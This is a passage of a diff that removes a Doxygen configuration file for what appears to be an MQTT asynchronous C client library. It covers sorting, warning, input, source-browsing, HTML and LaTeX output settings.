-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = NO
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = YES
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTAsync_main
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-STRIP_FROM_PATH        = @PROJECT_SOURCE_DIR@/src
-INPUT                  = @PROJECT_SOURCE_DIR@/src/MQTTAsync.h \
-                         @PROJECT_SOURCE_DIR@/src/MQTTClientPersistence.h
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# non of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          =
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILT_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
